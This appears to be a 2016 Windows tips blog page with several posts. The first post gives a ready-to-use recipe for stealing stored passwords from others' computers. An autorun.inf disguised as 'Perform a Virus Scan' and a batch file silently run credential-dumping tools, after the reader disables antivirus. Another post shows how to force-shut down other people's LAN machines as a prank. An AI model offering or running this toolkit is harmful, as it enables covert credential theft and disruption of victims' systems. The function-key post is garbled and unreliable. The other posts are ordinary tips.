Showing posts with label PC. Show all posts
Showing posts with label PC. Show all posts

Saturday 7 May 2016

How to Hack Passwords Using a USB Drive

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As we all know, Windows stores most of the passwords which are used daily, including instant messenger passwords such as MSN, Yahoo, AOL, Windows Messenger, etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exist many tools for recovering these passwords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail) if you use the associated programs of these accounts.
IE Pass viewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet Explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    Save the Notepad and rename it from New Text Document.txt to launch.bat.Copy the launch.bat file to your USB drive.
    Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pen-drive and the autorun window will pop-up. (This is because we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the.TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the.txt files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
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How to Change the Logon Screen Background in Windows 7

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How would you like to change the logon screen background in Windows 7 to give your Windows a customized look and feel? With a small tweak, it is possible to change the Windows 7 logon screen and set your own picture/wallpaper as the background.
Customizing the login screen background in Windows 7 is as simple as changing your desktop wallpaper. Well, here is a step-by-step instruction to change the logon screen background:
  1. The image you need to set as the login screen background should be a .jpgfile and its size should not exceed 245KB.
  2. The image resolution can be anything of your choice. However, I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.
  3. You will need to copy this image to the following location:
    You will need to create that path if it does not already exist on your computer.
  4. Now, open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key:
    If the key Background does not exist, then right-click on LogonUI, select new -> Key, and then name it as Background.
    Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New -> DWORD and name item background.
  5. Double-click on OEMBackground and set the Value Data to 1.
  6. Now log-off to see the new login screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

Using a Tool to Change the Logon Screen Background:

The above steps will give you detailed instructions on how to change the logon screen background manually. However, there is a nice tool to completely automate the above steps so that you can do everything with just a few mouse clicks!
The tool is called Windows 7 Logon Background Changer from This small tool is very easy to use and contains a set of preloaded images to choose from or you can set your own desired image as the logon screen background.
I hope you love this post! Pass your comments. Cheers :)
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How to Change Your IP Address

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Every time you connect to the Internet, your ISP (Internet Service Provider) assigns an IP address to your computer that makes it possible for websites and applications to keep track of your online activities and also pin point your physical location. Therefore, to protect your Internet privacy, it is often necessary to change your IP address.

Ways to Change IP Address

The following are some of the possible ways to change the IP address of your computer:

1. Using a VPN: Best Way to Change IP Address

Even though there are several methods to change your IP address, using a VPN proxy is by far the best and most secure way. The following are some of the most popular VPN proxies that most Internet users prefer:

  • Hide My Ass VPN – Hide My Ass is one of the most popular and trusted VPN services that provide a fast and secure proxy server to allow people to easily change their IP addresses and also obtain an IP address from any country of their choice.
  • VyprVPN – VyprVPN offers the world’s fastest VPN services to make it possible for its clients to easily change their real IP using a proxy and support a wide range of operating systems.

Advantages of using VPN over other methods:

  • Fast, secure and highly reliable. All your web traffic is encrypted to keep your data safe from hackers and also protect your privacy.
  • You can choose from a list of countries and locations to obtain a new IP address. This makes it possible to have your origin from any country of your choice.
  • Easily bypass regional blocks to access sites and content that are restricted for your location.

2.Change IP by Restarting the Router

Every time you connect to the Internet your ISP may assign a different IP to your computer called dynamic IP. If your Internet connection uses a dynamic IP you can easily change it just by restarting your network device such as modem/router. All you need to do is just turn off its switch for a few seconds and turn it on again to get a different IP address assigned.
Unlike using a VPN, this method has quite a few drawbacks. Your newly assigned IP will have the same location or country as before and therefore if you’re trying to bypass a country block it would not be possible. Moreover, if your Internet connection uses a static IP address, you will get the same IP assigned no matter how many times you restart your router.

3. Using Free Web Proxy to Change Your IP Address

If you cannot afford a VPN service or restarting the router doesn’t get you a new IP, you can try some of the free browser-based proxy services that help you change your IP address and surf anonymously. The following are some of the websites that offer free proxy services:

Drawbacks of using free web proxies

Even though these services come free of cost they also come with some of the following drawbacks:
  • Most of them are slow and websites take a lot of time to load.
  • Security and privacy are questionable as most of these free services are unreliable.
  • Users have to bare with annoying ads and pop-ups as these sites need to generate revenue to compensate for free service.
  • Limited or no choice over the selection of your IP location.

How to Ensure that Your IP is Changed?

To know your current IP address just type what is my IP address on Google and your public IP address should be displayed in the search results. Once you’ve successfully implemented one of the above-mentioned IP changing methods, you can re-check your IP on Google to make sure that you have got a new one.
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Sunday 1 May 2016


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This trick will shutdown a selected pc from Your LAN network. You can apply this trick to your office or school. but I take no responsibilities for any action. It's just for fun. Here is how to use this trick :

1. Go to Start > Run and type in cmd

2. You will see the command prompt window. Now type in this command line.

shutdown.exe -i

And hit Enter. You will see the remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button.

3. After entering the IP Address click OK. Now watch the person’s face as their computer shuts down.

Some friends have asked me that they got Access Denied error for the remote shutdown. Add the user with the privilege to force a remote shutdown on the computer you are about to Shutdown. To do this go to control panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and click on Add User or Group. Add the computer that runs the remote shutdown command.

Or you can do this go the computer you are about to Shutdown
a) Go to Start > Run > type in Regedit in the dialog box and hit enter
b) Go to My Computer/HKEY_LOCAL_MACHINE /system/current control set/control/lsa
c) Find “force guest” in the right pane Double click on it to modify This entry change the value from “1″ entry to “0″

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Saturday 5 March 2016


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Fake Facebook Accounts is Proving out to be a new Trend on Facebook. Probably 20-30% of total Facebook Accounts are fake or even more, This Number is Anticipated to be Increasing in Future. Fake accounts on Facebook are mainly Created with an intention to Spam all over Facebook and Spread Virus. Many people Create Fake Girl’s Profiles to Dupe Some innocent Fb Users too.
Sadly, Facebook Can’t Identify Fake Facebook Account and Delete them all Manually, and One Should not expect it from Facebook because of obvious reasons. But yes they will Definitely Block your account if you send lots of Friend requests to Unknown People and if you post or Comment Spammy Links over and over again. Facebook Catches you and then next time when you try to log in again, it asks you to Identify Photos of Friends, This is where Fake Account Users Get Caught.
But This Don’t Stop Spammers to Create another Fake Facebook account, So in this article, we will Discuss Some Tips that will help you to Identify Fake Facebook Account easily, So that you don’t fell in their Traps, Report that Account to Facebook which will Help to Make Facebook Safer to all of us.


1) Profile Picture :
  • First Thing we see about any Facebook account is their Profile Picture, If you Find any Facebook Account on your Friendlist suspicious, First thing you will do is Use Reverse Image Search. This helps you find out if Similar Pictures are available on the Internet.  First Download the Profile Picture of the account you find suspicious
  • Go to Google images Click on Camera icon which says Search by image, Click on Upload an Image, now choose the Picture you had downloaded earlier, Now once the uploading Completes, google will show you Similar Images that already exist over the internet.
2) Timeline:
  • The Facebook timeline of Facebook accounts says a lot about that Profile. Most Fake Profiles have “Female” as a gender, this doesn’t Mean all fb accounts with “Female” Genders are Fake, There are many other things to Identify Fake Facebook Account.
  • if their photos folder shows only 1 or 2 Pictures that too of random Celebrities then probably it's fake.
  • if the Person does not update Status, or if he does, the Comments does not read like his Real friends or the profile does not comment on others status, then its likely to be a Fake profile
  • The “About” tab will give you More information about the Profile if the “About” tab doesn’t show you any info about the person profile then that's an indication about the fake profile
3) Wait for 1st january:
  • This is kind of Funny, Why Would one Wait for 1st Jan to Identify Fake Facebook Account, Well Fake Profile Makers Most Probably Enter 1st Jan as their birth date while creating a Fake account. So on 1st Jan, Facebook will Show you People who have birthdays today. Go through that list and Unfriend them if you dont know them Personally.
  • On 1st Jan 2014, I was shocked to see 28 people Having their birthday, Guess what I performed the above Process.
4) Girls Profile :
  • Most of the Fake profiles are created with Girl Identity and with a Beautiful face as a Profile Picture, You may even find Cell phone Number, Girls Hardly will Share thier Contact number in Public.
  • A girl Profile with Lots of Friends and Followers indicates a Fake Profile.
These were some tips to Identify Fake Facebook Account, which I wanted to share with you all, if you find any Fake profile then you and your friends can report it to Facebook.
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We hear a lots and lots of concerning cases of hacking, softwares, malwares, viruses, etc, Here are some Computer Security tips to safeguard your PC/laptop against hacker intrusions, malware and different viruses that exploits your PC or Laptops.

Computer Security Tips to Protect your System information



A firewall is a software system that will handle outgoing and incoming Internet connections of your computer. You’ll be able to clearly use the one engineered into Windows by default, however this can be by no means the foremost Efficient. i will like to recommend Comodo Firewall which is free and straightforward to use. Using Firewall is just one of Computer Security tip that i want to mention


There are obvious reasons to use Anti virus Programs, but there are People that don’t have any antivirus or those who have, they have not upgraded thier antivirus since their permit has lapsed.. However there are quite powerful free antivirus Available. One must Install Antivirus to Protect and Keep thier Computer Secure


New vulnerabilities are found in software system or operative systems like Windows each day. So one must always updates thier software system. Keeping your installed Softwares upto date is Important, as it will Keep hackers away from breaking into your System and its Said that any upto date program Works smooth without any glitch.


Users like you and me use too weak  passwords that are very simple to detect for hackers, there are so many software which will try all Possible Combinations to Crack your Password, this is known as Bruteforce technique .  If your secret word(password) Consists of just 4 or 5 characters, it will easily discover it.
Your Password becomes harder to crack if it consists of 8 or 9 characters which also includes numbers, letters and special characters.To check the strength of your Password, there are plenty tools over internet. This is an important Computer Security tip that everyone must Consider.


Most common mistake people make is that they use same password everywhere over internet. Yes, its very hard to remember passwords for all accounts but its highly advisible to have different passwords for different accounts.
This Practice Comes handy if one of your account gets Compromised/Hacked, then your other accounts are still safe.


  • Finally, Abstain from getting hacked,  Always beware while Browsing Internet, don’t transfer and install everything and anything on your PC or Laptop.
  • Always check the sources of software system and websites that you just use to download programs.
  • Don’t be silly and amateur hackers won’t be able to do  anything to you (while serious and skilled hackers will not have any interest to hack you)
Do you have any Computer Security tip that you will like to share ? Feel free to comment below.

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You might be Using Windows for a long time but I am sure the majority of you guys don’t know all the features and Uses of F1-F12 keys on your keyboard. We all know Common shortcuts like CTRL+C to Copy and CTRL+V to Paste, But you might not know what F1, F2, F3…….F12 keys actually do and where and when to use them.
In this article, we will see Common features and Uses of F1-F12 keysand also how these keys can be used with the Combination of CTRL and ALT keys.



  • F1 key almost everywhere is used for “Help”.  if you are using windows OS and want help anywhere then press the F1 key, this will open up help window for you.
  • Sometimes F1 key is used to enter the BIOS (press F1 when your computer is about to boot).
  • A combination of Win + F1 keys will open the “Help and Support» Microsoft Windows.


  • Rapidly rename the chosen file or folder. Works in all adaptations of Windows.
  • Alt + Ctrl + F2 – Opens the Document as a Microsoft Word.
  • Ctrl + F2 – Opens the Preview window in Microsoft Word.
  • Frequently to enter the BIOS.


  • In the MS-DOS charge line or in Windows, press F3 to rehash the last summon.
  • Win + F3 – Advanced Search window opens in Microsoft Outlook.
  • Shift + F3 – Changes the content in Microsoft Word, from upper to lower case or capital letters at the start of each one expression.
  • If I am not mixed up, it is the F3 key which will cause the Application«Control» computers Apple, running Mac OS X.


  • This opens the location bar if you press F4 in Windows Explorer and Internet Explorer.
  • Rehash the last activity (MS Word )
  • Ctrl + F4 – Closes the window open in the present window, for example, a tab in the program
  • Alt + F4 – Closes the system window in Windows.


  • Refreshes the present page (works in all advanced programs), and additionally redesign the desktop or open organizers in Windows.
  • Running a slide demonstrate in Powerpoint.


  • Move the cursor in the location bar (additionally works in numerous advanced programs).
  • Ctrl + Shift + F6 – opens Document in Microsoft Word


  • Mostly used for spelling and grammar in a document programs Microsoft (Word, Outlook, etc.)


  • Pressing the F8 key while your PC is about to boot will result in booting your PC in Safe mode.


  • The F9 key does not have any functionality in Windows. It may however, be used in some individual programs. To find out if it is available in the program you are using, bring up the program’s help screen and type in the words function key.


  • Activates “Menu” in the open organizer window.
  • Shift + F10 – works the same as the right mouse click.
  • Pressing F10 while your system is booting will show you BIOS Information.
  •  F10 is used to enter the hidden recovery partition on computers Sony.


  • F11 Key will take you to Full-screen mode and it can be used and work in any Browser.


  • Opens the “Save As” in Microsoft Word.
  • Shift + F12 – Saves a document in Microsoft Word.
  • Ctrl + Shift + F12 – Prints a document in Microsoft Word.
  • F12 key will open up the Inspect element box in any Browser.
Fn + F1 or F2 or …. F12 keys will normally do the task that is Printed on the respective keys, This is basically for Laptop Users.
With this it Concludes my list of uses of F1-F12 keys in windows, if you know any more uses then please add to this article by Commenting Below.

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Though Today we will learn to Skip Windows logon Screen in Windows 7/8 and XP, My First advice to all will be not to do it if you are not the sole user of your PC or laptop. if you do so, it makes your PC vulnerable. Anyone will be able to access your PC , and hence your Important Files and other Data if you skip or disable windows logon screen.
On the other hand, if you are the only one to use your computer or if you don’t need to keep other people off your PC, then you can wholeheartedly Skip Windows logon Screen without any Problem. At times its boring to enter passwords every time you boot your PC, So why not disable the login screen so that your PC boots Directly and you can start working right away.


Step 1: First of all you will need to open the Advanced User account, 
  • Click on Start, type netplwiz and Click Enter (For Windows 7 & Vista users)
  • Click on Start, type control userpasswords2 and Click Enter (For Windows XP users)
  • Hover your mouse to any corner, Click on Search and type netplwiz in the app section then click on netplwiz (For Windows 8 users)
Step 2: After performing the above tasks in your version of Windows You will Get a dialogue box similar to below Picture. 1st you will have to select the Account, then Uncheck the box Users must enter a user name and password to use this computer and lastly click on ok.
Step 3: Now you will be asked to enter your password twice, so do it and that's enough we have done to Skip Windows logon Screen. You will see that the next time you boot your PC, you will not be asked for Username or Password.


After Disabling login screen, if you feel insecure and want the logon screen back then you can do it by again performing Step 1 in this tutorial and Check the box users must enter a user name and password to use this computer.
That's it now the next time your PC will boot, you will be asked for username and password.
If you have any doubts in the tutorial, feel free to Speak your mind in Comments below, and don’t forget to Subscribe for daily updates if you have still not done it. 
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